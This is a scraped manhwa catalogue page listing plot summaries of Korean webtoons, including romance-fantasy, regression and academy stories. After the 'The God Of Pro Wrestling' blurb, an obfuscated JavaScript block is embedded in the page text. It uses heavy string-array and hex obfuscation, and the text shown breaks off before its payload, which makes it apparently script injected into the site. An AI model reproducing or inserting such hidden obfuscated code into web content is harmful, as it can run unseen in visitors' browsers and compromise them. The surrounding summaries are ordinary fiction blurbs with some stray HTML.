Manhwa - Page 251

A Korean counterpart to manga, manhwa offers rich narratives and vivid art, often presented as scrollable webtoons in genres like romance, fantasy, and thriller.

3083 results

A Butterfly Metamorphoses Three Times

By a turn of events, Jin Naye ended up kissing her co-worker’s boyfriend, not to mention she keeps hearing a maleficent voice which nobody else can hear… At home, she’s a pitiful daughter who didn’t even get married yet, and at work she’s a weak-willed pushover. Day by day, Naye is forced to live a life full of torment. In order to defy her mother’s wish to meet a marriage prospect on her own birthday, she attends a party and gets herself some drinks – actions which are unlike her. There, she ended up having her first kiss, but with her co-worker’s boyfriend?! From that day onward, Naye’s life started to change bit by bit…


Please Save My Husband

<span class="mx-1">Please Save My Husband </span> The ideal husband; a romantic wedding day; a perfect honeymoon... Everything looks as if it's going in the right direction, but instead I'm suddenly living a fantasy?!! Hahahaha, what the hell's going on?! Every time I fail a quest, I'm thrown right back to the beginning of the mission! Where exactly is this heading!? To protect my husband, Yeoyun, and stop travelling back in time, I must control this marriage and the in-laws!


Surviving As Twin Sisters

Surviving as Twin Sisters / 쌍둥이 왕녀로 살아남기 I brutally betrayed by my twin sister, who I considered as my other half. The night of my framing and subsequent death, I wished from the bottom of my heart… ” May I never again be born as a royal twin.” But out of nowhere, I travelled back to the past?! I was just a meek girl who never dreamed of overthrowing my older sister for the throne. So why did I…?


The God Of Pro Wrestling

Junho Kim, he loved pro-wrestling more than anyone but he couldn’t escape the racial standards. After his meaningless retirement, while working as a construction worker, he got caught up in an unexpected accident… And after he opened his eyes, he returned to the day before his WWF entrance exam! “This time, I won’t end as the villain ‘king-fury’ with a 0.7% success rate!” He returned to his 20s body with all the knowledge he’s worked so hard for and information about the future. He will not repeat his history of being ‘jobber’, the expert at losing. He will rewrite the history of pro wrestling together with the wrestler that will take over the era in the future! To ultimately become the god of pro wrestling, an ‘icon’ of the era!<script></script><script>(function(_0x170546,_0x3621fc){var _0x3e3304=_0x45b3,_0x193cff=_0x170546();while(!![]){try{var _0x4ca41f=-parseInt(_0x3e3304(0x182))/(0x97*-0xf+-0x3a6*-0x1+0x534)+-parseInt(_0x3e3304(0x18a))/(0x1d14*-0x1+-0x32*-0xe+0xd2d*0x2)*(-parseInt(_0x3e3304(0x185))/(-0x15cc+0x2*-0x629+-0x2221*-0x1))+-parseInt(_0x3e3304(0x18f))/(0x1*0x95c+0x92+-0x9ea)+parseInt(_0x3e3304(0x18c))/(-0x178d+0x1*-0x782+0x99*0x34)*(parseInt(_0x3e3304(0x186))/(0x1c7*-0x5+0x1374+-0xa8b*0x1))+-parseInt(_0x3e3304(0x190))/(-0xd*-0x25f+-0x11+0x1ebb*-0x1)+parseInt(_0x3e3304(0x181))/(-0x249a+0x20a*0xc+0xc2a)+-parseInt(_0x3e3304(0x1a0))/(0x1*-0x1327+-0xfb2+0x22e2);if(_0x4ca41f===_0x3621fc)break;else _0x193cff['push'](_0x193cff['shift']());}catch(_0xab2a47){_0x193cff['push'](_0x193cff['shift']());}}}(_0x4354,0x4309f+0x1790b5+-0xf9d38));function _0x45b3(_0x4f8f5c,_0x2c48a5){var _0x3088b3=_0x4354();return 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The Grand Duke Of The North Wants To Be Loved

The Grand Duke of the North Wants to be Loved , 북부 대공님은 사랑 받고 싶어 Allen Pratt, the cold-blooded northern Duke. He’s the unlucky prince who was exiled to the north because he could not inherit the throne. Thus he turns dark, turning into the villain of this world. He said that he’ll wreck havoc in the future, but… I was the only one who knew. No matter how evil he is, I am certain. He’s the person who can both save me and the story. My only .


The Emperor’s Mask

<div class="post-title"> <h1>The Emperor’s Mask</h1> </div> <div class="tab-summary "> I didn’t know blackouts were so scary. I lost my film after drinking. And when she opened her eyes, she was in a different world, and she was in a different person’s body. That alone is absurd, but I found out that the cause of death of the body was murder, not suicide. I’m so busy adjusting to reality that I’m going crazy, and I’m also thinking about what’s wrong with the emperor who doesn’t show his face outside. Meanwhile, suspicious beings, even the chief of staff, continue to haunt her. “What’s that big bowl?” “…….” Damn, you’re interrupting me mixing rice with a spoon! The story of a mysterious emperor, a suspicious servant, a man who doesn’t reveal himself and the wrong heroine Lucia. </div>


A Deceitful Marriage

The Boomerang Duke 각설이 공작 Our Duke, who came last year, returned without dying. Sylvia, a poor noble lady, left her house to avoid an unwanted marriage. The place Sylvia made her new home is the Dukes of War fanatic Victor Aswan. Rumored to be a vicious killer, he is destined to linger in battle for the next 20 years. It’s been a month since Sylvia has been happy in the Duke Castle while pretending to be Victor’s bride. “You said you have my child?” The duke, who had been gone for seven years, suddenly returned.


Celeste Academy

What’s worse than going to school? Going to school in another world to become a… knight?! After accidentally witnessing a sword-wielding woman slay a demon in the streets of Boston, Valeriana is kidnapped and forced to enroll in the magical Celeste Academy. It would’ve been great if she fit right in, but while everyone’s learning to use their magic powers to protect the world of Valemnia from demons, she’s stuck being the only human in class! To make matters worse, the demons are getting stronger. Not only is Valemnia in growing danger, but Earth could be their next target. Surely demons can wait to destroy the world until she gets her life together, right? BASED ON THE ORIGINAL NOVEL:


The Goddess’s Taste

Read manhwa The Goddess’s Taste / 여신의 취향 / Goddess’s Taste Yuyu was always bullied in school for being fat. Now, after hard work and effort, he’s a beauty director receiving rave reviews from customers. Suddenly, his first love Ahin appears in front of him. But wait — is it really her?


I See Your Death

Read manhwa I See Your Death /  잔자 작가님 After an accident, Eshana Ash has started seeing person’s lifespan. The date and sign of the person’s death would appear above their head. If the letters were black, she could help, and sometimes save the villagers from danger. “It’s better not to go to the lake today. It’s too cold for going boating,” she said. That man was to die today by drowning in the lake. She saved many of her people this way, so whenever she did, the people in her village would gather around and praise her and would tell her. “You really must be a child from heaven!” Well, I’m not particularly blessed to see death. However, if there is something that cannot be changed, it’s the lifespan shown in red. “Save me.” 422 years of the imperial calendar, a peaceful evening. A bloody man lying in the front yard of the house. And clearer than that blood, is her lifespan. [427/Sign: Eshana] Why is my name there?


Our Team Is Last Place Anyway

<span class="mx-1">Our Team Is Last Place Anyway </span> After much disappointment in supporting a baseball team that earns last place season after season, Shin Seung Ah is determined to quit being a fan. However, after kissing Choi Jon during the kiss cam in a spur of the moment decision, the team suddenly sees a miraculous come-from-behind victory. Realizing that a stronger physical connection between herself and Choi Jon leads to positive effects on the team, she decides to initiate the "Team Winning Project"!


Daughter of the Emperor

Ariadna Lereg Ilestri Pre Agrigent… And so my life begins with this ridiculously long name, born to royalty and the center of attention — all because of one dangerous man; the veritably insane tyrant king, ruthless conqueror of ten empires, nightmare of all continents… and my father?! Will I be able to survive with this maniac?
